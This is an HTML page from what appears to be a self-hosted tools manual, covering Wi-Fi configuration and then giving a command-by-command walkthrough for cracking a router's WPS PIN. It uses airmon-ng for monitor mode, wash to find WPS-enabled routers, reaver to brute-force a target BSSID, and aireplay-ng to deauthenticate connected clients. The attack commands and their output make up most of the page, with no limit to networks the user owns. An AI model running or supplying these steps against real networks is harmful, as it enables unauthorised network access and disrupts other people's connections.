<html dir="ltr" lang="en">
    <head>
        <meta charset='utf-8'>
        <title>Wireless</title>
    </head>
    <body>
        <a href="index.html">Tools Index</a>

        <h1>Wireless</h1>

        <h2>Manual configuration</h2>

        <pre>
        # iwlist wlp2s0 scan
        # iwconfig wlp2s0 essid name_of_network
        </pre>

        <p>To get mac address of the target cell;</p>

        <pre>
        # iwlist wlp2s0 scan
        </pre>

        <p>Example output that matter;</p>

        <pre>
        Cell 03 - Address: A8:A6:68:98:0C:C5
        </pre>


        <h4>Recover Password WPS</h4>

        <p>First check processes that interfere with state of the interface and kill them;</p>

        <pre>
        # airmon-ng check


        Found 5 processes that could cause trouble.
        If airodump-ng, aireplay-ng or airtun-ng stops working after
        a short period of time, you may want to kill (some of) them!

        PID     Name
        1271    wpa_supplicant
        1576    wpa_supplicant
        1633    dhclient
        Process with PID 1576 (wpa_supplicant) is running on interface wlan0
        Process with PID 1633 (dhclient) is running on interface wlan0
        </pre>

        <p>Pkill or kill all of them, ex 1271;</p>

        <pre>
        # kill -15 1271
        </pre>

        <p>If that fails;</p>

        <pre>
        # kill -9 1271
        </pre>

        <p>If wireless card is intel;</p>

        <pre>
        # rmmod iwlmvm
        # rmmod iwlwifi
        # modprob iwlwifi
        </pre>

        <p>Put interface in monitor mode;</p>

        <pre>
        # iwconfig wlp2s0 mode monitor
        # ifconfig wlp2s0 up
        </pre>

        <pre>
        # airmon-ng start wlp2s0


        Interface       Chipset         Driver

        wlp2s0           Intel AC        iwlwifi - [phy1]
                                        (monitor mode enabled on mon0)
        </pre>

        <p>Airdump-ng don't report if a router have WPS or not, for that is used wash;</p>

        <pre>
        # wash -i wlp2s0
        </pre>

        <p>If the program report "Found packet with bad FCS", run with -C;</p>

        <pre>
        # wash -C -i wlp2s0
        </pre>

        <p>Put mon0 on same channel of target cell;</p>

        <pre>
        # iwconfig mon0 channel 6
        </pre>

        <p>Start the magic;</p>

        <pre>
        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv
        </pre>

        <p>If BSSID is cloaked, not being broadcasted, provide it to reaver;</p>

        <pre>
        # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv
        </pre>

        <p>-a address of access point, -c client to deauthenticate</p>

        <pre>
        aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
        </pre>


        <a href="index.html">Tools Index</a>

        <p>This is part of the LeetIO System Documentation.
        Copyright (C) 2021
        LeetIO Team.
        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
        for copying conditions.</p>
    </body>
</html>